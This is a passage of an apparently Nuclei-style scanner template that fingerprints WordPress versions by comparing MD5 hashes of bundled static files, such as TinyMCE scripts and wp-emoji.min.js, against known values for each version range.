type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"af19a270b1d81e1f110849c67b9943b8\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"6ed9c179e0db33ec6731caee24ed7aed\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"739e889aa58742bdb4931babc80316f0\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"289f30cdd11f8a23c6458f1319323791\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"a7a73c580a302db16002989c84c5bf4c\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"20d0972f30e29d1518a657e90074020a\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"2c161f4ab885f01643bad16fba20661b\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"5a20037a144e58522a11fdd71352ae08\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"01474b7f41da7d851c5a7f27aa2f2ff0\" == md5(body))" - - type: dsl - name: 2.2.1 - 2.3.3 - dsl: - - "(\"d3e7f564e4bea2af433d6f7f882370ab\" == md5(body))" - - type: dsl - name: 2.1 - 2.2 - dsl: - - "(\"e5641589c55d58143a5a14e5332428c0\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"742c7e852f2d121b5be88781ff0b93f6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/editor_template.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"a2b3085f0ab3c323dd28187b739139ec\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f2b1d655935e99315b93c540c6035c48\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"fd2835b5c1610d37e4f546cd45bdbbda\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"53051500ea1cae4d71a092378ae1726b\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"de50f43e740d9bcbb0bb5e5f31b0c45a\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"e4f47b78c98d99433c91ec4a145f7ff5\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"f063bd5bed9288e08acd8c6364f6679d\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"6b1b4ae45fe39b7b444d0dac8bbeb400\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"0b6cb9758b31dc49a1e6051dc67f56fa\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"dbe88526b02537b5670af1ae17b297df\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"caa70b329a15b7d276880d62a5d3b5cf\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"67c40f06846a456511d8688419451c18\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"fd5269ae542aca16ad8281ac551a576c\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"cc473d433ad83e107f8b417f8e07eb38\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/image.htm" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"7a6c90019843b98b685e2822412b6bcb\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"51398bf0a698cf6c3e3d4b76974804f8\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"b56263cc02fff500f707f51a797200ca\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"c4e555a4eb2d92b12cc274299893f5fb\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"a17cd268c9d523bf70ecf19757b93e22\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"549603c2a4def6160db28176cd7d7bc4\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"08e69d593392dd50963dcb346ca0071c\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"0d385db27642478443914ec2178e195c\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"019909ddbc8340e59cd64f4cdae21a6e\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"9c4fabe49f0526f70a897c86a49c7b1a\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"b9f13e7b518cdf55a2617f44aa6426fa\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"cd1355d6758f2d58982afda2c4b917fe\" == md5(body))" - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"6ee929f893a3cf67861b023f905baadd\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"390092c8f6af60b9a9d78fbdaf97d72a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/image.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"8d2c4871c2b431d003267d1ecebfecde\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"57b35a2d982e16ac9aac069345ec2300\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"27769fa50375e33e24e75cd356c085f4\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"10491e5ab4b2b507f18e0be5db37fbb7\" == md5(body))" - - type: dsl - name: 2.7 - 3.0.6 - dsl: - - "(\"fd4ba60e7499e1e06d8efc5841073a44\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"a8dd2a6733f5937952e90c7e80421905\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"088245408531c58bb52cc092294cc384\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"862f066cad8e2a478c43814f338fdd8c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/charmap.htm" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"e78d30352be54ce072b327c3f3ae5a1e\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"b2e2867e42e971a960e22d7fc355ba18\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"54f0b3a52f3bdecfae2fdaf9fa93a27c\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"119ead6c5c35d15999f47fa1ea8ea002\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"15e312d22a33ce3cade0ca6dd0a2ff06\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"90449ecb50b0aa527586a7217c136009\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"cf2e5b2fec3c06f763bd176d87ed4d0e\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"e514a461b0948068811c317af82305f0\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"63f3245f9cefd08530d8035399242d82\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"cafb84f559d7de79277a5b96a0e45f4a\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"b3f3e37cff43d90e2fec656b52f1b67a\" == md5(body))" - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"813a9c698d9150d198f438a7928bfa29\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"3de5b82cc08338afd1923941bdb0c86f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/pastetext.htm" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"e8598b664a0f4578a88c7c34e46c029d\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"7e2ab5dcd71147801312f12d9ad99d53\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"765a36671dc31ddf23bda7193e646842\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a5844c99bd289dcaf5561ae0f8ff0fc9\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"2d9e18b42ea47992ba2aa790a58e25aa\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"c49497ac4150a78c561f240ae16fc47b\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"892be984236242a11a6d4490a978d754\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"b82c2ee67a44ac0915ba6693ab622a36\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"a1b57674240bc9e8f76de47bf4b6f92a\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"47b91f20f6c5381f52a266da9fb87508\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"0aebc1e2f8890d774f61971091e3eba3\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"0185613272e7c57f43e9e021567c8030\" == md5(body))" - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"4895645731e0148b7e730eff6b78a4e0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/pasteword.htm" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"75afde509924223eab0c0b2535141192\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"7db62fe5ecea992a47ad567a59fddf4a\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"140c8639b95b5985387314ff5c538e20\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a6d0b98d7aab9dc483a865ee49e308f1\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"4fe34536718be4bcfa0e6e8f6ad9e9ae\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"d5836a7e2bb8b61683d6d2a1815e446d\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"60d6e9aaf1aafe06b85da92df1a486d3\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"d958f3b1931464c30d68b499231f9d63\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"7c601ec4eeee22f414ae093120b62bd0\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"62a7fcdff65cdfb1ac81160d49abd560\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"bc4d612287743f988a3f20fa66d2e611\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"002daa009655fa5e52d8374c25b7b95e\" == md5(body))" - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"c5e287e22909f9945c1bf65ceb7e66aa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/editor_plugin.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"15134339e36472281b8a1626233f747d\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"10a81b39a4bc07a7e804ae1ef9f66956\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"38b4fcfb8b026060b40c82087cd4082d\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"850959bac9b9257f66817c94fa35df27\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"89f4e23300ce29d55b985a37f61d95f0\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"994124fa3bbad1cfc9fb9900c10a6b00\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"d1ef8dc9ab08b7a58c5d96a56145ab4e\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"893f6c4038f293618722b42f4bf4c8e3\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"e1be69ab8e117a7f82952dfd9c2375e4\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"f45368a75b1c1879d5b0f5f164045e60\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/fullscreen.htm" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"d21fc65b8aade703572c6f396e475118\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"65798ace2436ed31098d3b9a58b8c3a5\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7a6c199ec99e3a7b7f20e1076e14f06f\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"f7ed49c39b482daac4809bc3bd79f4a8\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"86b8cb7ae6b53d825d0c49798d842445\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"626f666036f145cefe0013847c35bf17\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"f6429e142030a88e1dec026f53c600e6\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"ca9817da53d28adaee86603ca94d69dc\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"9f801bc7c58adb76341114ff20caa43a\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"291a2370a72b46ff6b94722d4807b64f\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"99a680170eaa55f849619048204f74d4\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"f8d9aec34e586ebb299ed43a39b7f7b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"cbfebda03eef4bd608a86827948c4224\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"89c9d4511cd7b90c00fdd9aa30c3bc18\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"8b3524554889bac4122fe6e15b95cdc0\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"bfaaa63c2867a7c1aa80783e423a9b87\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"047a9618f11ee697eec716c88dedd8e8\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"a7b58f0ddb0e55f591c00f06e21ada67\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"490ea06c259c55ed8364450ecb02852b\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"6d22dd7115baffc34269f0eef6b618ba\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"49982a4eed623c011535b63e82aadaef\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"9d3f90a4a9531d6aeedac9a0ed9309da\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"c6753be1486843060289ac3b3940e2cf\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"d2fdd7ee581e86820a4c57389464bd21\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/template.htm" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"31a49baf85e588fb217390f950e775e5\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"6deeea3f92e1992d587c08dc51cfd091\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"987df7a126c458f5394eb711c27f5e4d\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"876e269481446c34166f18b0bf0faa9b\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"b9d081d573fd166147d32c9f180a1293\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"67594d378e290c4c935289786f89278c\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"9145ca8842ce27e7a25b4821a710c520\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"2b2ca7c291b8b1b867b44a6e5bca7991\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"7d0fa8e3669dbb890fbdba95d21d432a\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"d45f680745ad8747b5a5120230759c26\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"7ef20f66074ae548be36c37667e65e52\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"c01f15cd357d8dba4610c3eae6321930\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/editor_plugin.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"5ad7db86c5008f98ec135595db4a4973\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9ce4c5f8e09f3b86b7b62abb19f32b09\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"81e16046103fb1776f30838d2bb4a378\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"cc97fbc2bc892884a3fc3e3cab3b9aba\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"bcd5c851ca50eee87904b410c13c6d8c\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"8711a73c0d6d417b635bf646dc5091c8\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"9beecec5d5cbdc86bee17eadc0f5a545\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"8b13bc1307b4c9d06122346c44b5e716\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"f6c1ba01ff7b8fb600c8a906a573c0ab\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"d3eca453edb0893447a1e993ce05a0f0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/media.htm" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"45d4c170a335c40f431569802a2f0e18\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"d8ada489c50c283c5732ff06aa72b4f8\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"0470b34fb0c140d8d917ada27d885b87\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"0a95f87ca9fc5dd7c8e91ed7e2a2b45d\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"d17ac310b24242e2b2cc14ca08a38385\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"a8fb1a8e0aa8ac0d2b06a8a4625908c4\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"03453eabdffe90cf7e9406d618b78c10\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"2e2426d4850c4c7040424234f0b24396\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"bf4c1c5ac6d22a90dfedfbab79fe1e03\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"e2a663d0abbf3c98e9c80e2df3d575a9\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"65c3b3ce2f72ce3436d6cda2ef852668\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/wp-fullscreen.js" - matchers: - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"669dfa41fd076fadd200112960a46fcb\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"781b0a7f92ace4c740bebd0ba2ec9cc5\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"b16b5388bafc33588edbf6d8a7d83932\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"d3b194e346461893b6366e6e9992e5c5\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"0d4afd93d02b73aed209f73e4d25469a\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"24644a8300d7318eefe876c659e57b3d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"4fa94e2fe8af8edc6ea416e1970c7cd8\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"5320e05e4751ce9c37efade68a6c0b48\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"5675f7793f171b6424bf72f9d7bf4d9a\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"7b423e0b7c9221092737ad5271d09863\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/skin.ie7.min.css" - matchers: - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"ab035d1d6fd828a1530ee6b2df22e70a\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"1ab68a0c95f250189323b986a707f70a\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"19d42e7af34d7880b12e6a40d74b0a89\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"58490013777e57ebaab84893713280c1\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.4.24 - dsl: - - "(\"cea6608407da4b0d07f4bdad387059c2\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"f85aec87569380b36901c67b3c2fad81\" == md5(body))" - - type: dsl - name: 4.0 - 4.2.29 - dsl: - - "(\"16b6170794ca6d5f7fd29073d4a5477f\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"09c1ba458c1670a68acbe8004e1c4b14\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/handlers.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"220adfeb811cbe402367392b44d5fbfd\" == md5(body))" - - type: dsl - name: 3.9 - 4.7.19 - dsl: - - "(\"14b2d04fdb85bc1f171cf3dfb2987dca\" == md5(body))" - - type: dsl - name: 3.5.2 - 3.8.35 - dsl: - - "(\"c5d6929ea46dc1bb4ef8bffc17b3e819\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.1 - dsl: - - "(\"793ff9921f096583ba52f8606ec79f4c\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"44b4f7cfec54b7fc8410a383257af538\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"784d62b41691c6c9e1d4f49bd18a9b20\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"df9ce8622e62e80c1a80613e5cb1b25b\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"b22b8b21967e1509304c76e13c3c5047\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"d7c136a3e2143f53b37803bb894c4250\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"fd1fdc830e7c1c1e4b6d3f0b29a2da05\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"150e7f1df4bcb8695a6330aad02cc9bc\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"5d1ea480360a4139c65308bc27ccd742\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"a9c61c5f04847006bfd229057721184a\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"4d16bff72b33fb1e11fc960aa4a4a23e\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"c2c1ec2ac323cd308b2dc6d58370f514\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce_popup.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"41116cb9eb54da596cb42468d2b5d69d\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.7.19 - dsl: - - "(\"dbe62082422b75d89ecb983409ec966d\" == md5(body))" - - type: dsl - name: 4.3 - 4.5 - dsl: - - "(\"83efe579f26f25ac80fe550402db2467\" == md5(body))" - - type: dsl - name: 4.2.2 - 4.2.29 - dsl: - - "(\"d84233dd293717f0a07b558b2fe38f56\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.1 - dsl: - - "(\"692f8e861bafa31fbf1b3805b4b0d7d3\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"38dbcc925529368812f5c2fbcb389616\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"5a318277fedf491a0301e177a9ef10b3\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"554bc76c70351187f4ce05ddc012aaed\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"9a9c125814b9715982d246a1ee78084f\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"677d2f88ae991728c80ef15d112652b2\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"5906da6296b5d6dc28cfb4a9cd2dd295\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"d9e6163fd6707bf0582635247bc17a5c\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"cda99de2ed0201e818ecdab304aa8a2a\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"7435f4fa6463572035c9c212558491f9\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"c96b7c2981d7b5c253812487be5cd71a\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"f539ddea7e23c2511166429ea78a2908\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"8a6b281d4baa3efbfa5c3690d7561a25\" == md5(body))" - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"2e1d0f50dc25586e43e6609f2ef9cc0e\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"628e60ccfa9b0e77822a5359f87d1f3b\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"4237af4931ba3003048f8eb5b98364c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-emoji.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"1acdd0cd523695bd920ccc418b0678c9\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"acf45356a0e8d21b985372c641109ae7\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.4.24 - dsl: - - "(\"e4462639dd52885cfdf136ff15956fed\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.2 - dsl: - - "(\"5b79b0ee9feabb912f6e3a9134eef5f7\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"137858b0d72b5f4637d414461f445008\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"f58df83b99c2e5bf0c6fe5f6313450f0\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"964ac7bf64ae9fddf0240fd1e3a04b67\" == md5(body))" - - type: dsl - name: 4.2.2 - dsl: - - "(\"3a083b99f4d138b72547e42f77027320\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"0f8be35f8c316861694298d218c11f5e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a98b282dc6d835e7c63db94f2bc15a38\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"e8e92de96b2688db7cbb361d0753831a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/text-widgets.min.js" - matchers: - - type: dsl - name: 4.8.2 - 4.8.15 - dsl: - - "(\"28f9be51cafa06930392acb005b8c824\" == md5(body))" - - type: dsl - name: 4.8.1 - dsl: - - "(\"3651b41fcb718e55e0de3a29212d71ea\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"ccbae9a28443a1ad1b5bbee115dc045b\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"32b7abeff170db2b017381efe0b78fad\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2fb0dbe77a00686b5e5b3fd2f3a7858f\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - 